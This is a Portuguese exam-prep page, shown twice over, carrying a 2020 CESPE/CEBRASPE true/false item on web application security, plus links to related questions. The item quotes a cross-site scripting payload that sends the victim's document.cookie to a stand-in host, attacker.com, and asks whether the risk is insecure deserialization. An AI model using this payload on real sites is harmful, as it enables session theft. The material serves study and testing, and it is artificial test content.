Nesse caso, o risco de segurança da aplicação é a desserialização i...

Question 1

Nesse caso, o risco de segurança da aplicação é a desserialização i...

📅 2020🏢 CESPE / CEBRASPE🎯 Ministério da Economia📚 Segurança da Informação e Criptografia

#Segurança Física e Lógica

Esta questão foi aplicada no ano de 2020 pela banca CESPE / CEBRASPE no concurso para Ministério da Economia. A questão aborda conhecimentos da disciplina de Segurança da Informação e Criptografia, especificamente sobre Segurança Física e Lógica.

Esta é uma questão de múltipla escolha com 2 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941201010328

Ano: 2020Banca: CESPE / CEBRASPEOrganização: Ministério da EconomiaDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica

Texto associado

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.

><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.

Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

A

B

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200390908Segurança da Informação e Criptografia

Com relação à segurança física e lógica e à operação de segurança da informação, julgue o item a seguir. A proteção de perímetro é usada para dissuadi...

#Segurança Física e Lógica

Questão 457941200914813Segurança da Informação e Criptografia

As vulnerabilidades relativas à área de segurança do tipo hardware incluem

#Avaliação de Vulnerabilidades e Gerenciamento de Riscos

Questão 457941201205670Segurança da Informação e Criptografia

Um protocolo de autenticação que utiliza JSON Web Token (JWT) é o

#Autenticação de Usuário

Questão 457941201660292Segurança da Informação e Criptografia

Em consonância com as normas NBR ISO/IEC 27.001:2006 e 27.002:2005, julgue os itens seguintes quanto a classificação, controle de ativos de informação...

#Norma ISO/IEC 27002#ISO/IEC 27001

Questão 457941201904267Segurança da Informação e Criptografia

De acordo com a NBR ISO/IEC 27002:2022, assinale a opção que indica o controle organizacional cujo propósito é assegurar a identificação e o entendime...

#Norma ISO/IEC 27002

Questão 457941201999701Segurança da Informação e Criptografia

Julgue o próximo item, relativo a continuidade do negócio e resposta a incidentes de segurança da informação. Os desastres relacionados a sistemas de ...

#Gestão de Continuidade de Negócios

Question 2

Nesse caso, o risco de segurança da aplicação é a desserialização i...

📅 2020🏢 CESPE / CEBRASPE🎯 Ministério da Economia📚 Segurança da Informação e Criptografia

#Segurança Física e Lógica

Esta questão foi aplicada no ano de 2020 pela banca CESPE / CEBRASPE no concurso para Ministério da Economia. A questão aborda conhecimentos da disciplina de Segurança da Informação e Criptografia, especificamente sobre Segurança Física e Lógica.

Esta é uma questão de múltipla escolha com 2 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941201010328

Ano: 2020Banca: CESPE / CEBRASPEOrganização: Ministério da EconomiaDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica

Texto associado

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.

><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.

Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

A

B

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200390908Segurança da Informação e Criptografia

Com relação à segurança física e lógica e à operação de segurança da informação, julgue o item a seguir. A proteção de perímetro é usada para dissuadi...

#Segurança Física e Lógica

Questão 457941200914813Segurança da Informação e Criptografia

As vulnerabilidades relativas à área de segurança do tipo hardware incluem

#Avaliação de Vulnerabilidades e Gerenciamento de Riscos

Questão 457941201205670Segurança da Informação e Criptografia

Um protocolo de autenticação que utiliza JSON Web Token (JWT) é o

#Autenticação de Usuário

Questão 457941201660292Segurança da Informação e Criptografia

Em consonância com as normas NBR ISO/IEC 27.001:2006 e 27.002:2005, julgue os itens seguintes quanto a classificação, controle de ativos de informação...

#Norma ISO/IEC 27002#ISO/IEC 27001

Questão 457941201904267Segurança da Informação e Criptografia

De acordo com a NBR ISO/IEC 27002:2022, assinale a opção que indica o controle organizacional cujo propósito é assegurar a identificação e o entendime...

#Norma ISO/IEC 27002

Questão 457941201999701Segurança da Informação e Criptografia

Julgue o próximo item, relativo a continuidade do negócio e resposta a incidentes de segurança da informação. Os desastres relacionados a sistemas de ...

#Gestão de Continuidade de Negócios